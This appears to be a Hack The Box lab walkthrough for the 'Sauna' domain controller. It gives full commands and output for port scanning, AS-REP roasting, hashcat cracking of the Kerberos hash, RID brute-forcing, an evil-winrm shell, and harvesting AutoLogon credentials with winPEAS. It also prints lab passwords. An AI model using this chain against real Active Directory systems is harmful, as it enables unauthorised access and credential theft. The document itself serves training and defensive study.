Sauna
Port scan
u505@naos:~/HTB/Machines/Sauna$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.175
Starting masscan 1.0.5 at 2020-12-28 15:15:23 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 389/tcp on 10.10.10.175
Discovered open port 49675/tcp on 10.10.10.175
Discovered open port 139/tcp on 10.10.10.175
Discovered open port 49667/tcp on 10.10.10.175
Discovered open port 636/tcp on 10.10.10.175
Discovered open port 445/tcp on 10.10.10.175
Discovered open port 49674/tcp on 10.10.10.175
Discovered open port 464/tcp on 10.10.10.175
Discovered open port 9389/tcp on 10.10.10.175
Discovered open port 49673/tcp on 10.10.10.175
Discovered open port 56995/tcp on 10.10.10.175
Discovered open port 49686/tcp on 10.10.10.175
Discovered open port 3268/tcp on 10.10.10.175
Discovered open port 5985/tcp on 10.10.10.175
Discovered open port 88/tcp on 10.10.10.175
Discovered open port 135/tcp on 10.10.10.175
Discovered open port 3269/tcp on 10.10.10.175
Discovered open port 53/tcp on 10.10.10.175
Discovered open port 80/tcp on 10.10.10.175
Discovered open port 593/tcp on 10.10.10.175
u505@naos:~$ nmap -sC -sV sauna
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-28 10:15 EST
Nmap scan report for sauna (10.10.10.175)
Host is up (0.038s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-12-28 23:23:57Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h08m05s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-12-28T23:24:00
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.86 seconds
Nmap finds a web server, Kerberos and Active Directory LDAP. DNS, Kerberos on 88, kpasswd on 464, LDAP plus the global catalog on 3268/3269 and SMB with signing required together mean the host is a domain controller for EGOTISTICAL-BANK.LOCAL. Two details matter later. The clock skew of just over 8 hours is far beyond the 5 minutes Kerberos tolerates, so anything that presents a ticket (getTGT.py, the -k option of the impacket tools, Kerberos authentication in evil-winrm) needs the attacker's clock aligned first, for example with sudo ntpdate 10.10.10.175 or faketime; the AS-REQ without pre-authentication used below carries no timestamp and is unaffected. And SMB signing being required rules out relaying NTLM to this host.
u505@naos:~$ cat ports | cut -d ' ' -f 4 | cut -d '/' -f 1 | sort -n | while read port
> do
> printf $port","
> done
53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49675,49686,56995,
We extract the open ports from the masscan output and run a script and version scan against all of them.
u505@naos:~$ nmap -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49675,49686,56995 -sC -sV sauna
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-28 10:22 EST
Nmap scan report for sauna (10.10.10.175)
Host is up (0.038s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-12-28 23:30:48Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  msrpc         Microsoft Windows RPC
56995/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h08m05s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-12-28T23:31:38
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.92 seconds
This second scan also shows WinRM (Windows Remote Management) listening on 5985/tcp, plus ADWS (the .NET Message Framing service on 9389) and the RPC high ports. WinRM is the natural way in once we have a valid domain credential: evil-winrm? :)
Web enumeration
Dirsearch
The web enumeration doesn't provide much information: the site is static HTML, and because IIS resolves paths case-insensitively dirsearch reports each file several times (index.html, Index.html, INDEX.html).
u505@naos:~/HTB/Machines/Sauna$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt,html,js" -f -t 1000 -u http://10.10.10.175
  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: txt, html, js | HTTP method: GET | Threads: 1000 | Wordlist size: 1102600

Error Log: /opt/utils/dirsearch/logs/errors-20-12-28_22-04-47.log

Target: http://10.10.10.175/

Output File: /opt/utils/dirsearch/reports/10.10.10.175/_20-12-28_22-04-47.txt

[22:04:47] Starting:
[22:04:48] 200 -    5KB - /index.html
[22:04:49] 200 -   30KB - /about.html
[22:04:49] 403 -    1KB - /images/
[22:04:49] 200 -   24KB - /blog.html
[22:04:49] 200 -   15KB - /contact.html
[22:04:49] 403 -    1KB - /Images/
[22:04:49] 301 -  150B  - /Images  ->  http://10.10.10.175/Images/
[22:04:49] 301 -  150B  - /images  ->  http://10.10.10.175/images/
[22:04:52] 301 -  147B  - /css  ->  http://10.10.10.175/css/
[22:04:52] 403 -    1KB - /css/
[22:04:52] 200 -   15KB - /Contact.html
[22:04:52] 200 -   30KB - /About.html
[22:04:53] 200 -    5KB - /Index.html
[22:04:56] 200 -   24KB - /Blog.html
[22:05:17] 301 -  149B  - /fonts  ->  http://10.10.10.175/fonts/
[22:05:17] 403 -    1KB - /fonts/
[22:05:28] 301 -  150B  - /IMAGES  ->  http://10.10.10.175/IMAGES/
[22:05:28] 403 -    1KB - /IMAGES/
[22:05:45] 200 -    5KB - /INDEX.html
[22:05:51] 301 -  149B  - /Fonts  ->  http://10.10.10.175/Fonts/
[22:05:51] 403 -    1KB - /Fonts/
[22:06:02] 200 -   37KB - /single.html
[22:06:25] 301 -  147B  - /CSS  ->  http://10.10.10.175/CSS/
[22:06:25] 403 -    1KB - /CSS/
[22:09:13] 200 -   15KB - /CONTACT.html
[22:14:11] 200 -   30KB - /ABOUT.html

Task Completed
Page hints
On the home page, the phrase "get a ticket to roast" hints that the box is vulnerable to a Kerberos roasting attack (AS-REP roasting or Kerberoasting).
The About page provides a second hint: a list of employee names, i.e. candidate usernames.
Kerberos roasting
Anonymous enumeration
Anonymous enumeration gives nothing beyond the domain name (already shown by nmap) and the fact that WinRM answers (also already known from nmap): a null-session smbmap lists no shares.
u505@naos:~/HTB/Machines/Sauna$ smbmap -H 10.10.10.175
[+] IP: 10.10.10.175:445	Name: sauna
u505@naos:~/HTB/Machines/Sauna$ crackmapexec smb 10.10.10.175/32
SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
u505@naos:~/HTB/Machines/Sauna$ crackmapexec winrm 10.10.10.175/32
WINRM       10.10.10.175    5985   SAUNA            [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM       10.10.10.175    5985   SAUNA            [*] http://10.10.10.175:5985/wsman
Obtain AS-REP hash and username
From the About page, we build a list of employee names.
u505@naos:~/HTB/Machines/Sauna$ cat userslist
Fergus Smith
Shaun Coins
Hugo Bear
Bowie Taylor
Sophie Driver
Steven Kerb
We turn the names into candidate logins with an awk script that emits the usual first.last, f.last, flast and lastf variants. Adding the user administrator and a made-up user u505 gives one account that certainly exists and one that certainly doesn't, so the two kinds of KDC answer below can be told apart.
u505@naos:~/HTB/Machines/Sauna$ cat usercreation.awk
BEGIN{
  print "administrator"
  print "u505"
}
{
  first=tolower($1)
  last=tolower($2)
  print first""last
  print first"."last
  print substr(first,1,1)"."last
  print substr(first,1,1)last
  print last"."substr(first,1,1)
  print last""substr(first,1,1)
}
u505@naos:~/HTB/Machines/Sauna$ awk -f usercreation.awk userslist > userroast
u505@naos:~/HTB/Machines/Sauna$ cat userroast
administrator
u505
fergussmith
fergus.smith
f.smith
fsmith
smith.f
smithf
shauncoins
shaun.coins
s.coins
...
skerb
kerb.s
kerbs
In a loop, we request an AS-REP for each candidate login without pre-authentication. The KDC's answer enumerates users for us: KDC_ERR_C_PRINCIPAL_UNKNOWN means the account doesn't exist, "doesn't have UF_DONT_REQUIRE_PREAUTH set" means it exists but is protected by pre-authentication, and a $krb5asrep$ line means the account exists and has pre-authentication disabled, so the KDC hands material encrypted with the user's key to anyone who asks. The same thing can be done in one call with GetNPUsers.py -usersfile userroast -format hashcat, and kerbrute userenum does the enumeration part faster.
u505@naos:~/HTB/Machines/Sauna$ cat userroast | while read user
> do
> python3 /opt/utils/impacket/examples/GetNPUsers.py -no-pass EGOTISTICAL-BANK.LOCAL/$user
> done
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for administrator
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for u505
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for fergussmith
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for fergus.smith
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for f.smith
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for fsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:41cb0d465b4732f384dd162d44a0b52a$...
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for smith.f
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for smithf
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for shauncoins
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for shaun.coins
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for s.coins
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
...
[*] Getting TGT for skerb
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for kerb.s
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for kerbs
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
We obtain an AS-REP hash for the login fsmith: the account has "Do not require Kerberos preauthentication" set (UF_DONT_REQUIRE_PREAUTH, userAccountControl bit 0x400000). On the defending side the same accounts are found with Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} or the LDAP filter (userAccountControl:1.2.840.113556.1.4.803:=4194304); there is rarely a good reason for the flag to be set.
Crack the Kerberos AS-REP hash
We copy the hash to a file.
u505@naos:~/HTB/Machines/Sauna$ cat TGTfsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:41cb0d465b4732f384dd162d44a0b52a$...
We look up the hashcat mode for the hash prefix. $krb5asrep$23$ is mode 18200 (Kerberos 5, etype 23, AS-REP). etype 23 is RC4-HMAC, whose key is simply the NT hash of the password, so every guess costs one MD4 plus a few HMAC-MD5 operations with no key stretching at all. The AES etypes 17 and 18 derive the key with PBKDF2 (4096 iterations) and are far slower to crack; in this hashcat version they are only listed for TGS-REP (19600/19700) and pre-auth (19800/19900), which is why GetNPUsers.py asks the KDC for RC4 and gets an etype 23 reply unless RC4 has been disabled for the account.
u505@naos:~/HTB/Machines/Sauna$ hashcat --example-hashes | grep -A1 -B 2 Kerberos

MODE: 7500
TYPE: Kerberos 5, etype 23, AS-REQ Pre-Auth
HASH: $krb5pa$23$user$realm$salt$5cbb0c882a2b26956e81644edbdb746326f4f5f0e947144fb3095dffe4b4b03e854fc1d631323632303636373330383333353630
--
MODE: 13100
TYPE: Kerberos 5, etype 23, TGS-REP
HASH: $krb5tgs$23$*user$realm$test/spn*$b548e10f5694ae018d7ad63c257af7dc$35e8e45658860bc31a859b41a08989265f4ef8afd75652ab4d7a30ef151bf6350d879ae189a8cb769e01fa573c6315232b37e4bcad9105520640a781e5fd85c09615e78267e494f433f067cc6958200a82f70627ce0eebc2ac445729c2a8a0255dc3ede2c4973d2d93ac8c1a56b26444df300cb93045d05ff2326affaa3ae97f5cd866c14b78a459f0933a550e0b6507bf8af27c2391ef69fbdd649dd059a4b9ae2440edd96c82479645ccdb06bae0eead3b7f639178a90cf24d9a
--
MODE: 18200
TYPE: Kerberos 5, etype 23, AS-REP
HASH: $krb5asrep$23$user@domain.com:3e156ada591263b8aab0965f5aebd837$007497cb51b6c8116d6407a782ea0e1c5402b17db7afa6b05a6d30ed164a9933c754d720e279c6c573679bd27128fe77e5fea1f72334c1193c8ff0b370fadc6368bf2d49bbfdba4c5dccab95e8c8ebfdc75f438a0797dbfb2f8a1a5f4c423f9bfc1fea483342a11bd56a216f4d5158ccc4b224b52894fadfba3957dfe4b6b8f5f9f9fe422811a314768673e0c924340b8ccb84775ce9defaa3baa0910b676ad0036d13032b0dd94e3b13903cc738a7b6d00b0b3c210d1f972a6c7cae9bd3c959acf7565be528fc179118f28c679f6deeee1456f0781eb8154e18e49cb27b64bf74cd7112a0ebae2102ac
--
MODE: 19600
TYPE: Kerberos 5, etype 17, TGS-REP
HASH: $krb5tgs$17$srv_http$synacktiv.local$849e31b3db1c1f203fa20b85$948690f5875125348286ad3346d27b43eaabc71896b620c16de7ddcdbd561628c650c508856a3f574261948b6db4b48332d30536e978046a423ad4368f9a69b4dc4642dab4e0d475d8299be718fd6f98ac85a771b457b2453e78c9411dfce572b19660fe7a5a8246d9b2a91ea2f14d1986ea0a77ecf9b8330bc8fd9ab540bcf46b74c5aa7005cfccd89ec05f66aeab30c6b2bf8595cf6c9a1b68ad885258850c4b1dd9265f270fb2af52fd76c16246df51ea67efc58a65c345686c84e43642febe908a
--
MODE: 19700
TYPE: Kerberos 5, etype 18, TGS-REP
HASH: $krb5tgs$18$srv_http$synacktiv.local$16ce51f6eba20c8ee534ff8a$57d07b23643a516834795f0c010da8f549b7e65063e5a367ca9240f9b800adad1734df7e7d5dd8307e785de4f40aacf901df41aa6ce695f8619ec579c1fa57ee93661cf402aeef4e3a42e7e3477645d52c09dc72feade03512dffe0df517344f673c63532b790c242cc1d50f4b4b34976cb6e08ab325b3aefb2684262a5ee9faacb14d059754f50553be5bfa5c4c51e833ff2b6ac02c6e5d4c4eb193e27d7dde301bd1ddf480e5e282b8c27ef37b136c8f140b56de105b73adeb1de16232fa1ab5c9f6
--
MODE: 19800
TYPE: Kerberos 5, etype 17, Pre-Auth
HASH: $krb5pa$17$hashcat$HASHCATDOMAIN.COM$a17776abe5383236c58582f515843e029ecbff43706d177651b7b6cdb2713b17597ddb35b1c9c470c281589fd1d51cca125414d19e40e333
--
MODE: 19900
TYPE: Kerberos 5, etype 18, Pre-Auth
HASH: $krb5pa$18$hashcat$HASHCATDOMAIN.COM$96c289009b05181bfd32062962740b1b1ce5f74eb12e0266cde74e81094661addab08c0c1a178882c91a0ed89ae4e0e68d2820b9cce69770
Hashcat runs for 5 seconds before the password is cracked.
u505@naos:~/HTB/Machines/Sauna$ hashcat -m 18200 TGTfsmith /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.1.1) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 11.1)
====================
* Device #1: GeForce GTX 960M, 1971/2004 MB, 5MCU

OpenCL API (OpenCL 1.2 CUDA 11.1.114) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: GeForce GTX 960M, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 151 MB

Dictionary cache hit:
* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:41cb0d465b4732f384dd162d44a0b52a$...:Thestrokes23

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:41cb0d4...fdfb3f
Time.Started.....: Mon Dec 28 22:57:52 2020 (3 secs)
Time.Estimated...: Mon Dec 28 22:57:55 2020 (0 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3348.1 kH/s (11.33ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10567680/14344384 (73.67%)
Rejected.........: 0/10567680 (0.00%)
Restore.Point....: 10485760/14344384 (73.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: XiaoLing.1215 -> TGVbiyz1
Hardware.Mon.#1..: Temp: 43c Util: 44% Core:1202MHz Mem:2505MHz Bus:16

Started: Mon Dec 28 22:57:51 2020
Stopped: Mon Dec 28 22:57:56 2020

u505@naos:~/HTB/Machines/Sauna$ hashcat -m 18200 TGTfsmith /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:41cb0d465b4732f384dd162d44a0b52a$f05bf9551daf1589b2c1526484812f34b01683283c73db1720460e210e6e03132c507fc3a02bd50eb8271005ed7cb8f53e8b942d672f5d14fd0b02d88a0fd04999f6548944d64b208b4bdc4843ed4fc3eb4b7e6049df6b168268bcc79c0928925733a220b50c0353a83d911ca1b7ac402b40626139202b5af8213078db3c81740b10b4e35c93083a8297a12f714dafbad9e6325b3577d3a43713c39424dcd3184a12a2fa8b739b97f3f44d329ef5f2dba52568325860c09e881e8940b1c61510e5c737fc3833c0545ac3462ad052c36e68c0927b92eb03e340ff8b7a8ff332dbf7aa7db9d283d4b0a80cdaf3e25e150711b13a1abb6dc54f7778398596fdfb3f:Thestrokes23

u505@naos:~/HTB/Machines/Sauna$ hashcat -m 18200 TGTfsmith /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show | cut -d ':' -f 3
Thestrokes23
AD enumeration with user fsmith
crackmapexec confirms the login and password.
u505@naos:~/HTB/Machines/Sauna$ crackmapexec smb 10.10.10.175/32 -u fsmith -p Thestrokes23
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
The share listing doesn't give any hint: fsmith only has read access to the default domain controller shares (IPC$, NETLOGON, print$, SYSVOL). SYSVOL is always worth a look for Group Policy Preferences files carrying a cpassword, but that was not pursued here.
u505@naos:~/HTB/Machines/Sauna$ sudo crackmapexec smb 10.10.10.175/32 -u fsmith -p Thestrokes23 --shares
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
SMB         10.10.10.175    445    SAUNA            [+] Enumerated shares
SMB         10.10.10.175    445    SAUNA            Share           Permissions     Remark
SMB         10.10.10.175    445    SAUNA            -----           -----------     ------
SMB         10.10.10.175    445    SAUNA            ADMIN$                          Remote Admin
SMB         10.10.10.175    445    SAUNA            C$                              Default share
SMB         10.10.10.175    445    SAUNA            IPC$            READ            Remote IPC
SMB         10.10.10.175    445    SAUNA            NETLOGON        READ            Logon server share
SMB         10.10.10.175    445    SAUNA            print$          READ            Printer Drivers
SMB         10.10.10.175    445    SAUNA            RICOH Aficio SP 8300DN PCL 6                 We cant print money
SMB         10.10.10.175    445    SAUNA            SYSVOL          READ            Logon server share
RID brute-forcing through SAMR lists the domain's users and groups without touching LDAP. Besides the built-ins there are three user accounts, HSmith, FSmith and svc_loanmgr, plus the machine account SAUNA$.
u505@naos:~/HTB/Machines/Sauna$ crackmapexec smb 10.10.10.175/32 -u 'fsmith' -p Thestrokes23 --rid-brute
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
SMB         10.10.10.175    445    SAUNA            [+] Brute forcing RIDs
SMB         10.10.10.175    445    SAUNA            498: EGOTISTICALBANK\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.10.175    445    SAUNA            500: EGOTISTICALBANK\Administrator (SidTypeUser)
SMB         10.10.10.175    445    SAUNA            501: EGOTISTICALBANK\Guest (SidTypeUser)
SMB         10.10.10.175    445    SAUNA            502: EGOTISTICALBANK\krbtgt (SidTypeUser)
SMB         10.10.10.175    445    SAUNA            512: EGOTISTICALBANK\Domain Admins (SidTypeGroup)
SMB         10.10.10.175    445    SAUNA            513: EGOTISTICALBANK\Domain Users (SidTypeGroup)
SMB         10.10.10.175    445    SAUNA            514: EGOTISTICALBANK\Domain Guests (SidTypeGroup)
SMB         10.10.10.175    445    SAUNA            515: EGOTISTICALBANK\Domain Computers (SidTypeGroup)
SMB         10.10.10.175    445    SAUNA            516: EGOTISTICALBANK\Domain Controllers (SidTypeGroup)
SMB         10.10.10.175    445    SAUNA            517: EGOTISTICALBANK\Cert Publishers (SidTypeAlias)
SMB         10.10.10.175    445    SAUNA            518: EGOTISTICALBANK\Schema Admins (SidTypeGroup)
SMB         10.10.10.175    445    SAUNA            519: EGOTISTICALBANK\Enterprise Admins (SidTypeGroup)
SMB         10.10.10.175    445    SAUNA            520: EGOTISTICALBANK\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.10.175    445    SAUNA            521: EGOTISTICALBANK\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.10.175    445    SAUNA            522: EGOTISTICALBANK\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.10.175    445    SAUNA            525: EGOTISTICALBANK\Protected Users (SidTypeGroup)
SMB         10.10.10.175    445    SAUNA            526: EGOTISTICALBANK\Key Admins (SidTypeGroup)
SMB         10.10.10.175    445    SAUNA            527: EGOTISTICALBANK\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.10.175    445    SAUNA            553: EGOTISTICALBANK\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.10.175    445    SAUNA            571: EGOTISTICALBANK\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.10.175    445    SAUNA            572: EGOTISTICALBANK\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.10.175    445    SAUNA            1000: EGOTISTICALBANK\SAUNA$ (SidTypeUser)
SMB         10.10.10.175    445    SAUNA            1101: EGOTISTICALBANK\DnsAdmins (SidTypeAlias)
SMB         10.10.10.175    445    SAUNA            1102: EGOTISTICALBANK\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.10.175    445    SAUNA            1103: EGOTISTICALBANK\HSmith (SidTypeUser)
SMB         10.10.10.175    445    SAUNA            1105: EGOTISTICALBANK\FSmith (SidTypeUser)
SMB         10.10.10.175    445    SAUNA            1108: EGOTISTICALBANK\svc_loanmgr (SidTypeUser)
And as guessed before, fsmith has access via WinRM. For the winrm module, crackmapexec's Pwn3d! only means a remote shell is available, not that the user is an administrator. :)
u505@naos:~/HTB/Machines/Sauna$ cr crackmapexec winrm 10.10.10.175/32 -u fsmith -p Thestrokes23
WINRM       10.10.10.175    5985   SAUNA            [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM       10.10.10.175    5985   SAUNA            [*] http://10.10.10.175:5985/wsman
WINRM       10.10.10.175    5985   SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)
User flag
u505@naos:~/HTB/Machines/Sauna$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
<USER_FLAG>
Privilege escalation
Privilege escalation awesome scripts
After taking a look for a while, I uploaded winPEAS to the box via evil-winrm.
u505@naos:~/HTB/Machines/Sauna$ cp /opt/utils/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe ./
From the Evil-WinRM terminal
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload winPEAS.exe Info: Uploading winPEAS.exe to C:\Users\FSmith\Documents\winPEAS.exe
Data: 629416 bytes of 629416 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Documents> .\winPEAS.exe
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Creating Dynamic lists, this could take a while, please wait...
  - Checking if domain...
  - Getting Win32_UserAccount info...
...
  [+] Home folders found
    C:\Users\Administrator
    C:\Users\All Users
    C:\Users\Default
    C:\Users\Default User
    C:\Users\FSmith : FSmith [AllAccess]
    C:\Users\Public
    C:\Users\svc_loanmgr

  [+] Looking for AutoLogon credentials
    Some AutoLogon credentials were found!!
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
...
